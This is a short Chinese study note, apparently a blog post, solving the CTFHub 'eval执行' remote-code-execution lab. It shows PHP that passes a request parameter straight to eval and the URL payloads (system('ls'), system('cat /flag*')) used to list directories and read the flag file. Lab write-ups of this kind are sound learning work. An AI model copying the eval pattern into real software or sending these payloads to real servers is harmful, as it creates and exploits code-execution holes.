CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
hssfscv12 分钟前
Javaweb学习笔记——JDBC和Mybatis
笔记·学习·mybatis
羊小猪~~16 分钟前
数据库学习笔记(十八)--事务
数据库·笔记·后端·sql·学习·mysql
Heynchy25 分钟前
ThreadLocal分析简介【Android学习】
android·学习
医工交叉实验工坊35 分钟前
2026国自然改版后,该如何写
学习
●VON36 分钟前
DeepSeek-V3.2 模型在 OpenJiuWen 中的部署实践
学习·华为·von·openjiuwen
咚咚王者38 分钟前
人工智能之核心基础 机器学习 第七章 监督学习总结
人工智能·学习·机器学习
grd41 小时前
Electron for OpenHarmony 实战:Pagination 分页组件实现
python·学习
W|J1 小时前
ES 学习笔记
笔记·学习·elasticsearch
山土成旧客1 小时前
【Python学习打卡-Day35】从黑盒到“玻璃盒”:掌握PyTorch模型可视化、进度条与推理
pytorch·python·学习
@zulnger1 小时前
python 学习笔记(循环)
笔记·python·学习
热门推荐
01GitHub 镜像站点02手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)062025 最新教程:注册并切换到美区 Apple ID07GitLab 零基础入门指南:从安装到项目管理全流程08Claude Code Skills 实用使用手册09Labelme从安装到标注:零基础完整指南10UV安装并设置国内源